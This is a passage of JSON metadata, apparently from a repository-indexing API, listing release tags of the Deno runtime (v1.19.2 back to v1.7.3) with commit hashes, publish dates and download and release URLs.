2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/